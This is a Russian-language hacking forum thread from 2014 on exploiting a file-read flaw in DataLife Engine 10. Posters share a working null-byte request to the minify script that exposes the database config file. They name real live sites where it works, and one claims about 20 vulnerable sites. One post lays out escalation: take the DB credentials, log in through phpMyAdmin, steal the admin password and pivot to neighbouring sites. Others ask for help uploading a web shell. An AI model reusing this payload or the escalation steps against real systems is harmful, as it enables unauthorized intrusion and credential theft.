ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.03.2014, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
21252
Репутация:
15
|
|
в десятых версиях работает где есть похожий на этот файл
./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e 9736c
тогда такой джет выводит данные
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
если просто так вставить то не работает.
|
|
|
|
26.03.2014, 16:34
|
|
Новичок
Регистрация: 14.03.2010
Сообщений: 1
Провел на форуме:
15489
Репутация:
0
|
|
Сообщение от Donnel
Donnel said:
Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.
а я уже сайтов 20 нашёл.
вот например:
Сообщение от None
http://www.dle9.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
|
|
|
26.03.2014, 21:38
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Screami
Screami said:
а я уже сайтов 20 нашёл.
вот например:
Молодец!, хорошая бага! +
|
|
|
|
11.04.2014, 16:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
1334
Репутация:
0
|
|
Кто может помочь залить шелл через админку
версия движка 10
есть доступ в админку
|
|
|
|
18.04.2014, 17:14
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737
Репутация:
1
|
|
Сообщение от Screami
Screami said:
а я уже сайтов 20 нашёл.
вот например:
В примере конфиг не читается!
400 Bad Request
Please see http://code.google.com/p/minify/wiki/Debugging.
есть рабочий пример?
|
|
|
|
18.04.2014, 21:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
42267
Репутация:
5
|
|
Сообщение от pharm_all
pharm_all said:
В примере конфиг не читается!
400 Bad Request
Please see http://code.google.com/p/minify/wiki/Debugging.
есть рабочий пример?
http://erolib.ru/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
|
|
|
|
19.04.2014, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
984
Репутация:
0
|
|
Сообщение от lansia
lansia said:
http://erolib.ru/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
бага интересная, и вопрос такой, как раскрутить эту багу, т.е через что за юзать и вытащить данные от админки или залить шелл?
|
|
|
|
20.04.2014, 00:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от 06shurik
06shurik said:
бага интересная, и вопрос такой, как раскрутить эту багу, т.е через что за юзать и вытащить данные от админки или залить шелл?
Эта бага, используется как обычная читалка файлов, можете локально читать конфиги для подключения к БД, а дальше к примеру через phpmyadmin, заходите и берете логин/пасс админа и профит! или если есть соседние сайты, то ищите путь к ним и по такому же прицепу, хорошим плюсом было бывает, когда удаленное подключение к БД идет, тогда вам phpmyadmin искать не прийдется)
|
|
|
|
21.04.2014, 14:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
1897
Репутация:
0
|
|
Народ, бага шикарна, согласен, увидел примеры, аплодирую стоя. Но у меня она выдает 400 Bad Request. Не на все сайты, а на один (!). Что за черт? Подскажите.
|
|
|
|
01.08.2014, 17:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
24770
Репутация:
2
|
|
Скорее всего пофиксили уже, но что делать если при переходе по site.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
Происходит редирект :3
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
